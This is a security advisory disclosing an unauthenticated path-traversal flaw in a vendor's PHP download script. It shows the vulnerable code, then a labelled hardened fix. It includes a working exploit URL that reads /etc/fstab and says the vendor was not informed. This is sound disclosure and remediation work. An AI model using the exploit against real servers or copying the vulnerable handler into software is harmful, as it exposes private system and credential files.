big-lick-website-backup.txt - advisories - Security advisories that I have released to the public.
(HTM) git clone git://jay.scot/advisories
---
big-lick-website-backup.txt (1357B)
---
Name     Big Lick Media: Website Backup
Severity High
Vendor   www.biglickmedia.com
Authors  Jay Scott
Date     10th Jan 2009
Status   Vendor has NOT been informed

DESCRIPTION

download.php takes the name of the file to send from the "file" query
parameter and passes it straight to filesize() and readfile(). The value is
never validated, never restricted to the backup directory, and the script
performs no authentication. An unauthenticated remote user can therefore
retrieve any file the web server process is able to read, either by
absolute path or by "../" traversal.

EXPLOIT

Simply go to the following address in a web browser. Change the file
variable to the file you wish to download. Absolute paths work as shown;
since nothing strips "../", paths relative to the application directory
work as well.

<path to application>/download.php?file=/etc/fstab

Note that basename() is applied only to the name sent in the
Content-Disposition header, not to the path that is opened, so the file is
saved under its bare name (here "fstab") while the full path is read.

VULNERABLE CODE

<?php
// download.php (vulnerable): the file name comes straight from the query
// string and is never validated or restricted to a directory.
$filename = $_GET['file'];

// required for IE, otherwise Content-disposition is ignored
if(ini_get('zlib.output_compression'))
    ini_set('zlib.output_compression', 'Off');

// The extension only selects a Content-Type; it does not limit what is served.
$file_extension = strtolower(substr(strrchr($filename,"."),1));

switch( $file_extension )
{
    case "gz":  $ctype="application/x-gzip"; break;
    case "zip": $ctype="application/zip"; break;
    default:    $ctype="application/download";
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers
header("Content-Type: $ctype");
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
// Sinks: filesize() and readfile() operate on the attacker-controlled path,
// so any file the web server user can read is returned to the client.
header("Content-Length: ".filesize($filename));
readfile("$filename");
exit();

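FIXED CODE (EXAMPLE)

The following is an added example of how the handler above could be
hardened. It is not Big Lick Media's code. The backup directory
(/var/www/backups) and the session key used for the authentication check
(admin_id) are assumptions made for illustration; the rest follows directly
from the defects described above: the endpoint is authenticated, the client
may only name a file (never a directory), the name is restricted to a
conservative character set and the two extensions the original handler
served, and the resolved path is checked to still lie inside the backup
directory before anything is read.

```php
<?php
// Added example, not the vendor's code: a hardened replacement for the
// download.php handler in the advisory above.

// Only files inside this directory may be served (assumed location).
define('BACKUP_DIR', '/var/www/backups');

// The original endpoint had no authentication at all; require a logged-in
// admin session (the session key name is an assumption).
session_start();
if (empty($_SESSION['admin_id'])) {
    header('HTTP/1.1 403 Forbidden');
    exit('Forbidden');
}

$requested = isset($_GET['file']) ? (string) $_GET['file'] : '';

// Keep only the last path component. A client has no business naming
// directories, so "../x", "/etc/fstab" and "dir/x" all reduce to a bare name.
$name = basename($requested);

// Reject empty names, dot-files and anything outside a conservative
// allow-list of characters. The pattern also rejects embedded NUL bytes,
// which older PHP filesystem functions silently truncate on.
if ($name === '' || $name[0] === '.' || !preg_match('/\A[A-Za-z0-9._-]+\z/', $name)) {
    header('HTTP/1.1 400 Bad Request');
    exit('Invalid file name');
}

// Serve only the extensions the original handler was written for, and let
// the extension select the type instead of falling through to a default.
$ext   = strtolower(pathinfo($name, PATHINFO_EXTENSION));
$types = array('gz' => 'application/x-gzip', 'zip' => 'application/zip');
if (!isset($types[$ext])) {
    header('HTTP/1.1 400 Bad Request');
    exit('Unsupported file type');
}

// Resolve the final path and confirm it still lies inside BACKUP_DIR. With a
// bare name traversal is already impossible; this additionally defeats a
// symlink inside the backup directory that points somewhere else.
$base = realpath(BACKUP_DIR);
$path = realpath(BACKUP_DIR . DIRECTORY_SEPARATOR . $name);
if ($base === false || $path === false || !is_file($path)
    || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
    header('HTTP/1.1 404 Not Found');
    exit('Not found');
}

// Same IE workaround as the original.
if (ini_get('zlib.output_compression')) {
    ini_set('zlib.output_compression', 'Off');
}
header('Content-Type: ' . $types[$ext]);
// $name is restricted to [A-Za-z0-9._-], so it cannot break out of the
// quoted filename or inject a header.
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
header('Cache-Control: private, must-revalidate');
readfile($path);
exit();
```

With this in place the original request, download.php?file=/etc/fstab,
reduces to the name "fstab", fails the extension check and is answered with
400 rather than the contents of the file. A request for a real backup such
as download.php?file=site-2009-01-10.zip is only honoured for an
authenticated session and only if that file exists inside the backup
directory.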